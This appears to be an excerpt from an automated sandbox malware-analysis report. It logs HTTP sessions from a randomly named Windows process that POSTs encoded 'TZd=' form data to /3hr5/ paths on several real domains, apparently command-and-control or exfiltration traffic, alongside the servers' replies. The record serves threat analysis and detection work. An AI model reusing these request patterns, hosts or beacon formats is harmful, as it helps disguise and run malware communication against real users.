                                                                                                                              Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              88192.168.11.205021923.227.38.74808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:17.037573099 CET2626OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.littlehappiez.com
                                                                                                                              Referer: http://www.littlehappiez.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 48 4b 72 31 72 4a 7a 57 5a 75 2f 69 71 35 5a 43 63 59 6f 64 72 6e 42 32 2f 71 41 68 63 70 71 79 7a 36 45 33 63 61 74 76 4f 79 73 36 31 6e 78 62 6b 55 2b 68 59 44 75 32 57 4c 58 47 4e 34 34 46 42 7a 70 64 4e 47 47 4e 4a 79 66 6f 2f 34 63 6b 72 55 52 76 55 79 31 78 6b 58 79 45 4a 6a 73 55 6a 52 61 35 6f 53 33 45 67 31 78 6a 74 73 6b 54 62 59 38 4f 69 4e 77 4d 66 38 6f 41 6c 56 6a 70 72 4f 6e 50 48 76 36 47 34 36 2f 51 5a 4f 61 5a 4e 58 5a 54 42 30 57 53 47 53 58 34 4a 45 51 2f 6e 66 46 61 4e 57 50 66 42 69 68 32 6b 54 2b 59 58 53 63 55 57 36 78 77 36 66 31 49 4d 64 75 38 59 73 6b 75 67 44 37 38 4c 53 46 6c 6a 70 4e 35 31 77 61 30 6a 6a 44 71 4b 34 2b 41 69 53 32 34 71 39 4b 67 31 77 36 33 32 37 4d 72 4d 74 59 73 45 73 46 63 55 4a 45 46 31 4d 5a 7a 76 4e 58 5a 6d 4d 30 53 45 51 49 71 47 2f 42 68 34 68 47 4d 69 35 74 75 4a 54 39 51 36 6f 71 66 39 72 54 66 39 74 71 58 4a 4d 4e 50 62 6b 36 45 74 56 75 6e 44 63 53 49 42 72 2b 54 62 64 73 4f 76 4b 66 36 50 52 48 49 58 63 41 51 43 33 38 4e 41 74 46 53 63 52 35 49 7a 4d 47 4e 54 35 49 45 59 49 7a 35 72 31 52 69 38 69 42 73 75 64 4c 52 36 6e 7a 79 38 58 55 6a 71 66 74 43 58 68 38 2b 73 59 67 32 43 45 54 55 2b 72 65 7a 75 2b 59 4c 46 38 6f 76 73 66 4d 56 53 55 64 4c 64 6e 6c 39 69 45 7a 76 5a 48 69 75 6c 77 48 71 55 77 62 56 7a 47 4a 70 79 67 4c 42 53 47 7a 31 69 6d 73 35 53 51 38 75 48 2b 63 30 6b 66 61 63 58 30 71 71 52 36 76 6c 6f 34 50 70 33 4d 76 53 76 59 65 2b 37 6a 53 74 79 79 36 30 6f 6d 54 2b 53 34 35 36 6e 74 62 68 4c 70 54 37 34 43 54 4d 5a 54 49 70 6a 68 54 78 51 71 2f 7a 4c 45 56 4d 53 61 34 38 43 49 35 58 65 78 32 35 73 43 45 34 6f 47 55 2f 2b 66 7a 6d 6b 70 74 4d 6d 34 64 63 4f 4b 68 6f 37 6b 30 72 38 6a 59 36 4c 45 32 65 38 6f 75 72 2f 64 79 53 72 71 2b 61 42 48 78 45 4b 70 34 77 31 73 36 71 54 4b 4a 70 6b 76 4f 39 4f 4c 66 55 67 69 64 32 76 4c 69 59 4f 6a 4a 6d 44 73 75 46 4d 55 4a 78 68 75 2b 55 58 72 43 56 63 67 66 6d 74 68 6f 74 57 76 54 65 2f 55 6c 74 79 65 31 34 34 52 6c 45 53 6a 59 45 68 78 45 39 4e 2f 77 43 45 4e 52 39 4d 5a 68 78 52 34 78 78 54 4d 4f 54 6c 7a 6e 6b 64 77 56 35 49 51 2b 52 44 66 4b 72 44 2b 39 50 54 64 33 59 45 75 45 4c 36 59 5a 56 46 55 47 52 63 72 4a 52 30 63 35 32 68 4e 30 59 42 59 5a 39 51 33 35 6c 6c 6a 38 32 53 76 65 41 53 37 39 77 69 61 30 30 69 54 65 45 56 73 2f 57 4b 56 37 37 43 70 42 73 2b 4a 34 39 41 7a 43 51 74 34 36 63 45 59 38 7a 52 4d 59 62 30 51 79 31 38 4c 36 4a 64 50 49 47 6b 50 45 45 69 77 43 45 4d 6d 48 77 4d 6c 54 6f 2f 71 44 79 31 68 69 31 49 72 70 61 43 45 6b 51 45 41 62 4c 41 78 70 70 2b 78 7a 4b 77 4b 50 6d 4c 65 47 77 73 4c 59 79 59 4b 54 52 45 7a 56 7a 6c 78 78 47 70 78 71 69 55 66 5a 33 70 70 41 6f 6f 79 34 57 72 32 45 47 6a 4a 75 65 41 6b 54 56 47 73 54 67 37 57 4b 48 2b 72 46 74 45 68 49 78 63 54 5a 51 48 43 4f 67 68 71 58 72 6a 50 7a 32 34 48 4c 59 64 78 67 76 69 2b 4e 52 4f 33 79 63 46 75 59 4d 32 65 54 59 33 78 65 6e 70 46 6f 4e 41 76 35 59 6b 70 7a 50 6b 6b 37 34 76 5a 51 31 78 67 38 59 74 69 32 73 65 30 62 74 37 5a 34 37 4d 6e 2f 79 4c 54 42 77 57 49 53 66 4a 71 6f 66 32 43 35 48 45 4d 4a 37 6a 36 65 58 71 76 67 49 51 2f 78 61 79 75 7a 49 79 74 31 37 47 4e 5a 71 79 6e 6f 70 43 47 4c 72 4a 72 45 70 6d 31 6e 4b 57 56 53 56 59 4c 76 72 41 6d 50 49 70 78 30 64 78 71 32 79 32 64 50 53 77 77 44 6c 41 42 6c 6f 2b 78 67 39 6f 66 58 2b 74 6a 71 4a 30 59 5a 68 4b 62 74 57 74 5a 71 39 58 6e 4d 61 7a 4b 58 69 33 64 69 34 58 69 79 68 4c 34 4b 79 74 4e 78 46 78 4f 49 36 5a 38 39 68 57 70 54 51 4e 62 32 36 35 54 35 65 61 44 61 38 39 31 61 6b 64 65 62 65 31 4e 74 61 71 30 76 47 49 77 7a 44 4f 4f 71 48 4e 75 76 75 35 37 4d 53 4d 47 6d 70 4b 79 49 79 6f 59 46 47 34 65 55 54 43 6d 6d 33 55 53 50 4c 78 56 2f 6f 73 78 79 51 32 58 36 67 68 35 6d 41 58 41 4a 30 39 76 51 78 69 48 36 31 74 78 71 34 73 77 75 78 34 30 4e 4d 43 39 45 31 4f 50 5a 51 4b 6d 44 61 67 36 62 4a 4c 6e 61 71 58 57 69 52 70 6f 74 6f 73 65 31 66 34 4d 44 57 78 57 64 77 50 47 66 76 65 38 6f 4a 6c 45 4e 6c 6c 42 35 48 43 6c 67 43 58 49 65 59 59 51 4a 4c 42 59 6f 48 43 42 64 79 71 76 4b 39 6b 36 57 38 31 6e 6c 4d 37 77 78 42 47 55 6d 74 49 59 47
                                                                                                                              Data Ascii: TZd=HKr1rJzWZu/iq5ZCcYodrnB2/qAhcpqyz6E3catvOys61nxbkU+hYDu2WLXGN44FBzpdNGGNJyfo/4ckrURvUy1xkXyEJjsUjRa5oS3Eg1xjtskTbY8OiNwMf8oAlVjprOnPHv6G46/QZOaZNXZTB0WSGSX4JEQ/nfFaNWPfBih2kT+YXScUW6xw6f1IMdu8YskugD78LSFljpN51wa0jjDqK4+AiS24q9Kg1w6327MrMtYsEsFcUJEF1MZzvNXZmM0SEQIqG/Bh4hGMi5tuJT9Q6oqf9rTf9tqXJMNPbk6EtVunDcSIBr+TbdsOvKf6PRHIXcAQC38NAtFScR5IzMGNT5IEYIz5r1Ri8iBsudLR6nzy8XUjqftCXh8+sYg2CETU+rezu+YLF8ovsfMVSUdLdnl9iEzvZHiulwHqUwbVzGJpygLBSGz1ims5SQ8uH+c0kfacX0qqR6vlo4Pp3MvSvYe+7jStyy60omT+S456ntbhLpT74CTMZTIpjhTxQq/zLEVMSa48CI5Xex25sCE4oGU/+fzmkptMm4dcOKho7k0r8jY6LE2e8our/dySrq+aBHxEKp4w1s6qTKJpkvO9OLfUgid2vLiYOjJmDsuFMUJxhu+UXrCVcgfmthotWvTe/Ultye144RlESjYEhxE9N/wCENR9MZhxR4xxTMOTlznkdwV5IQ+RDfKrD+9PTd3YEuEL6YZVFUGRcrJR0c52hN0YBYZ9Q35llj82SveAS79wia00iTeEVs/WKV77CpBs+J49AzCQt46cEY8zRMYb0Qy18L6JdPIGkPEEiwCEMmHwMlTo/qDy1hi1IrpaCEkQEAbLAxpp+xzKwKPmLeGwsLYyYKTREzVzlxxGpxqiUfZ3ppAooy4Wr2EGjJueAkTVGsTg7WKH+rFtEhIxcTZQHCOghqXrjPz24HLYdxgvi+NRO3ycFuYM2eTY3xenpFoNAv5YkpzPkk74vZQ1xg8Yti2se0bt7Z47Mn/yLTBwWISfJqof2C5HEMJ7j6eXqvgIQ/xayuzIyt17GNZqynopCGLrJrEpm1nKWVSVYLvrAmPIpx0dxq2y2dPSwwDlABlo+xg9ofX+tjqJ0YZhKbtWtZq9XnMazKXi3di4XiyhL4KytNxFxOI6Z89hWpTQNb265T5eaDa891akdebe1Ntaq0vGIwzDOOqHNuvu57MSMGmpKyIyoYFG4eUTCmm3USPLxV/osxyQ2X6gh5mAXAJ09vQxiH61txq4swux40NMC9E1OPZQKmDag6bJLnaqXWiRpotose1f4MDWxWdwPGfve8oJlENllB5HClgCXIeYYQJLBYoHCBdyqvK9k6W81nlM7wxBGUmtIYGl7NESaiGu7FNlBJ7Vbom4XLaMzxwV5FmgJZh1SiFh/QkInbIDsRoR3inmONhae/KKdpNvSZTpTQ0S5BEU32OJzSu6Z4q/aFm4kGKSVuMP1sUt7SmcXe798Ty/yMgHnZOv+bcGQ4jqrQO1DZQ4qoXXbZTWOhOr5PcfX3P1eKvFx97VWj6i5QiWUJ1OH/jCX6nH+ZnOx0h0bG/boiP+ettfPo83yTHQs0uuXM+UITsdSym+wX6V9Ia4P6+1difmziNSquDqTEiZgU1MwvU//B1IxOfIZF6Mhg++NYO9Kt80UHNbHxPn2oQXvHvT6HeLVZ4ahnDp9hMOcsMW/AXGXjmpe53DhhjgrbiOwlmoc96yygHfNW6wYThwP3ICrvaNZUxHaQSMHcKo0q3uDU3Z1lI6cvKzBhoYWJ3Z54fdGvfBk4LtaxVDqzDeROSKTqmpP99ge+13LFr0EECU2hLqoVxJVx5vmxOgOEA90rH/dQcH7dPUU07vlTUT3xiSKx0m3Hi2qMhkp8me9I7VhbwvNMddrsZFPeZBBczPncViQNaIWvLy1CRTxyi71OkZqRXJGvzzY+Q5QkC0kPSElmzGgBb81K2tPWI0tVqftcH58p1kTH9h+OcQxJzE
                                                                                                                              Dec 4, 2023 15:28:17.037766933 CET10342OUTData Raw: 2f 4c 31 72 64 31 79 72 36 39 66 2b 52 62 73 66 49 6f 72 62 79 6c 45 6b 37 6e 67 44 77 4e 4e 4e 71 30 71 4c 4c 51 35 72 42 44 37 75 52 58 6d 45 66 70 35 67 45 74 58 63 46 50 57 6a 50 70 33 74 66 4a 6f 56 64 7a 65 7a 70 6b 6e 4c 43 4f 71 32 4d 66
                                                                                                                              Data Ascii: /L1rd1yr69f+RbsfIorbylEk7ngDwNNNq0qLLQ5rBD7uRXmEfp5gEtXcFPWjPp3tfJoVdzezpknLCOq2MfsGYVOlTxjRHTTBZVxU4BVdKzizC0cCbMEL0nz5wmlXgbNgR61+TuzP3DWHMvOQqpkbsyimxrOcpbHqg9psAHN1LSnU94fcadLivE/GVIfrBv2RxSvMqlw/cJsm/0ziwTdKoAWThV+oqe6pEcpPUZw0fQ9AotN8YqR
                                                                                                                              Dec 4, 2023 15:28:17.133529902 CET3912OUTData Raw: 44 49 41 48 42 48 55 4a 54 4b 32 78 7a 55 41 65 4e 66 59 4c 6b 6d 59 2f 4b 33 56 72 6e 6f 36 68 42 56 48 5a 52 38 6b 55 51 68 47 6a 74 4f 46 6c 45 30 31 66 51 33 77 45 46 6a 36 4c 44 61 4f 55 51 38 56 79 61 73 32 32 47 48 61 31 6e 51 48 78 52 58
                                                                                                                              Data Ascii: DIAHBHUJTK2xzUAeNfYLkmY/K3Vrno6hBVHZR8kUQhGjtOFlE01fQ3wEFj6LDaOUQ8Vyas22GHa1nQHxRXwswU98O0tfdCeKYQHm86CB/TQjJoXZUiG6tx6KEVp+UDMHSh60FeSgQnGTpvaR/hb3YjW1wbRSQ1nWXoFpdv0UkjLFRej17hCve558WkoqfG0/Ltjmw9Egoae/YEh1NhrLxo0/1u4LHPthuaYfCbRgBJ0Q8LNXe4g
                                                                                                                              Dec 4, 2023 15:28:17.133620977 CET6484OUTData Raw: 6e 37 65 52 76 68 50 58 31 57 62 6e 76 63 4f 53 79 41 62 51 39 54 69 4c 52 31 57 77 35 49 75 56 32 6b 2b 41 75 74 51 75 49 6b 63 6c 46 65 74 6c 43 54 48 33 6d 33 42 56 7a 44 48 51 42 64 4e 77 44 49 51 70 7a 74 5a 50 54 32 64 52 37 31 36 41 7a 53
                                                                                                                              Data Ascii: n7eRvhPX1WbnvcOSyAbQ9TiLR1Ww5IuV2k+AutQuIkclFetlCTH3m3BVzDHQBdNwDIQpztZPT2dR716AzS11xOuQ+tDVi79EG607sF5xTZjQHYiD0kRWDpqgubTLQYokdc5SgFjyA2z07Iuh7CfCZAqzf5FLa3kvIZG+TMr41UZorBThzT38h+EN9KUNEOtIbSvZ00JnBkwynEGTNBn+YyjyZs5JTeAYSzEwEe2HrGotCFOEW+g
                                                                                                                              Dec 4, 2023 15:28:17.134033918 CET10342OUTData Raw: 49 53 70 32 71 42 67 4c 79 54 61 68 71 41 33 5a 71 43 2b 47 39 34 32 64 48 2b 45 34 67 30 6d 6c 49 73 52 4d 39 59 4f 57 5a 44 67 35 49 45 57 50 6c 4b 70 38 6e 42 4f 61 6f 33 4f 6b 4f 4c 59 56 46 52 38 67 73 42 47 70 36 62 46 6a 4b 50 42 6f 35 74
                                                                                                                              Data Ascii: ISp2qBgLyTahqA3ZqC+G942dH+E4g0mlIsRM9YOWZDg5IEWPlKp8nBOao3OkOLYVFR8gsBGp6bFjKPBo5tWtrquNHKU+TwyPvk9nT99MTMTYHqq9yNfbMqY6Ndr6hQdXsDHJBCzrgeMmONbjCb3xInDqG8MyhpYWj/afEfYkAVPqcPDRo/KxCzXG1WmJs6qSBqoRXfvIkkqs+bXAesFyjNaay3pZ7jrYE7ey4EtNFogUzH2GBUa
                                                                                                                              Dec 4, 2023 15:28:17.134335041 CET5198OUTData Raw: 4d 58 6b 52 30 4e 69 66 68 46 49 57 4d 57 45 6c 58 4e 68 39 52 4c 42 72 63 44 71 6c 6d 47 35 64 35 65 6d 42 6a 65 74 55 63 41 2f 53 32 39 79 50 6e 32 55 72 50 59 39 31 54 6a 4a 41 67 76 75 33 35 57 43 46 67 7a 50 62 73 51 79 44 6a 74 31 2f 39 62
                                                                                                                              Data Ascii: MXkR0NifhFIWMWElXNh9RLBrcDqlmG5d5emBjetUcA/S29yPn2UrPY91TjJAgvu35WCFgzPbsQyDjt1/9bTQybt0YS2N9ATZxb5QYzukwjBqr72OcvAH40oSoB3gORRC+B+WFlxYmadcZBDBD/7l+N14M0vFV35v4HSR+zLf7McPaiRsL/bGdOpf+YKQSMOBu3FnWHSjhbuWNtbYsbmp7WQtv9bGKLZZtRWGmLF+R5xVyeyNVmz
                                                                                                                              Dec 4, 2023 15:28:17.228692055 CET2626OUTData Raw: 49 53 59 79 2b 38 35 76 66 79 48 67 6d 52 73 44 36 63 6c 4a 55 56 4a 76 57 57 48 37 6a 32 78 49 4f 51 50 69 78 7a 74 35 2b 52 56 59 2b 37 6c 6d 66 6a 4d 70 75 79 53 4e 57 75 4e 45 31 50 6c 6a 76 4e 41 6d 39 45 75 31 76 53 7a 76 66 38 64 76 65 52
                                                                                                                              Data Ascii: ISYy+85vfyHgmRsD6clJUVJvWWH7j2xIOQPixzt5+RVY+7lmfjMpuySNWuNE1PljvNAm9Eu1vSzvf8dveRtznLPBz2RZLuEgyMKBG6owuzxnXU52RLdipFHkwJrqW0pjM/H8sBdcmep8BPtB5jrwMOPLLd0NJmXYomttWavRxhk7cAYcMmAIjDQHEuTP53RrnQ+AKR8R//0aj+xOi2OomtdRf1/dXHvNJe7iMxiypawZMajnT4I
                                                                                                                              Dec 4, 2023 15:28:17.229779005 CET2626OUTData Raw: 51 44 64 4e 33 75 34 47 73 2f 49 6c 6c 63 72 72 78 49 5a 49 72 4b 43 4e 34 57 33 68 4c 52 74 54 6b 37 31 59 7a 63 67 30 38 4b 50 45 52 64 55 36 45 34 45 56 4d 45 78 37 66 47 41 77 63 64 71 69 4c 79 78 49 71 76 57 35 42 4e 4c 45 4c 7a 67 6d 30 46
                                                                                                                              Data Ascii: QDdN3u4Gs/IllcrrxIZIrKCN4W3hLRtTk71Yzcg08KPERdU6E4EVMEx7fGAwcdqiLyxIqvW5BNLELzgm0FZoVYs8xzZHoqYYfBNqoXOi0HQVpJH6ald9Zhlti4SSLuckKkQ7ihcBtneUIa8pkJ4pC9ejZ07/pyFxUxt3tCln2vxoHFyB4Be4QLxEC81RWum4L04Xz0hg0npWIgM2uFnpCcNCt8CsY7gct6Vk3j5FaCjj0BW+1NI
                                                                                                                              Dec 4, 2023 15:28:17.229922056 CET9829OUTData Raw: 53 44 45 61 67 32 71 6f 35 78 75 66 54 2b 6e 37 6b 43 68 4a 56 66 4c 4b 73 4b 47 71 73 36 2b 5a 77 64 70 7a 55 49 72 5a 2f 34 32 76 76 47 55 55 34 44 35 53 49 49 4e 4f 4a 6d 30 66 35 41 33 76 61 31 4e 7a 59 66 53 65 65 34 34 75 65 58 76 31 6b 31
                                                                                                                              Data Ascii: SDEag2qo5xufT+n7kChJVfLKsKGqs6+ZwdpzUIrZ/42vvGUU4D5SIINOJm0f5A3va1NzYfSee44ueXv1k1YqlM0mgQE+ECnPdNse0RKlYdu8lHvu1IXYSIsOpcfverT1ZpTUqnGzPHlrLOvxNBTSYkUQiYdJyTukYESFE5VOdBfGuwp865WNI5PbzHL+vGiTzFlR4qif6Pc/B7kgWA3KhpF9OWSwp2YmXeuhiqq45H0H18G/SpN
                                                                                                                              Dec 4, 2023 15:28:17.561101913 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:17 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Content-Language: en-US
                                                                                                                              Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:17 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:17 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_y=2e4bd00b-11d3-4efc-9730-41f05ece12d0; Expires=Tue, 03-Dec-24 14:28:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_s=219adf6f-de36-4280-bfaa-386c2d51f9ae; Expires=Mon, 04-Dec-23 14:58:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Server-Timing: processing;dur=161
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=031c8eb7-0c56-477
                                                                                                                              Data Raw:
                                                                                                                              Data Ascii:
                                                                                                                              Dec 4, 2023 15:28:17.561177969 CET1035INData Raw: 2d 62 64 66 34 2d 37 34 36 33 39 66 63 34 35 37 34 66 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a 58
                                                                                                                              Data Ascii: -bdf4-74639fc4574fX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                              Dec 4, 2023 15:28:17.561234951 CET1340INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                              Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              89192.168.11.205022023.227.38.74808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:19.660556078 CET542OUTGET /3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:28:19.810173035 CET1340INHTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:19 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              X-Storefront-Renderer-Rendered: 1
                                                                                                                              Location: https://littlehappiez.com/3hr5?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1
                                                                                                                              X-Redirect-Reason: https_required
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              Content-Security-Policy: frame-ancestors 'none';
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Vary: Accept
                                                                                                                              powered-by: Shopify
                                                                                                                              Server-Timing: processing;dur=10;desc="gc:1", db;dur=4, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="jjff", requestID;desc="23cdd8ec-14c7-4fc8-b550-3ca0adb83c25"
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              X-Dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                                                                                              X-Request-ID: 23cdd8ec-14c7-4fc8-b550-3ca0adb83c25
                                                                                                                              X-Download-Options: noopen
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p7sn8jdfKha2DWz%2BMoKeCFnT9YwFE54RmnNy86U5eXgdY0J2o8c2LRZ9gJ2HfK0a7qLwwRuG6WrCddRc%2FgL86jTpih2aDxfYRmMIxHuZrFMn
                                                                                                                              Data Raw:
                                                                                                                              Data Ascii:
                                                                                                                              Dec 4, 2023 15:28:19.810221910 CET329INData Raw: 6a 6a 36 6c 75 4b 36 62 6a 78 45 49 41 51 35 46 42 6b 30 67 71 59 69 39 47 4e 73 4a 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                              Data Ascii: jj6luK6bjxEIAQ5FBk0gqYi9GNsJQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=53.999901Server: cloudflareCF-RAY: 8304bc373a5f1869-EWR
                                                                                                                              Dec 4, 2023 15:28:19.810254097 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              90192.168.11.205022191.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:25.186373949 CET822OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.engindenizyurdu.com
                                                                                                                              Referer: http://www.engindenizyurdu.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 52 77 7a 31 74 30 30 4e 51 4c 62 6a 70 52 6d 55 4f 2b 42 35 34 4c 76 43 42 2f 62 2b 35 50 2b 4e 79 6f 30 65 6b 62 4b 6a 43 2b 39 4f 6d 67 68 59 61 6a 44 54 6f 37 6e 71 53 62 30 50 76 34 56 36 77 55 35 45 47 48 58 45 68 6a 50 34 48 2b 6a 6b 74 50 2f 62 2f 78 6e 38 42 32 73 72 47 6f 63 35 57 37 57 6e 66 7a 69 35 64 38 55 78 46 66 66 63 62 53 43 73 6b 4a 53 70 4c 42 45 4f 77 45 66 32 77 77 6f 6b 56 4b 48 4b 4a 6d 63 61 42 44 70 72 4f 4f 50 43 33 43 55 6a 70 37 4f 43 70 33 30 49 67 53 68 66 4e 32 4b 53 63 52 75 41 39 62 39 36 64 51 3d 3d
                                                                                                                              Data Ascii: TZd=Rwz1t00NQLbjpRmUO+B54LvCB/b+5P+Nyo0ekbKjC+9OmghYajDTo7nqSb0Pv4V6wU5EGHXEhjP4H+jktP/b/xn8B2srGoc5W7Wnfzi5d8UxFffcbSCskJSpLBEOwEf2wwokVKHKJmcaBDprOOPC3CUjp7OCp30IgShfN2KScRuA9b96dQ==
                                                                                                                              Dec 4, 2023 15:28:25.369597912 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:25 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
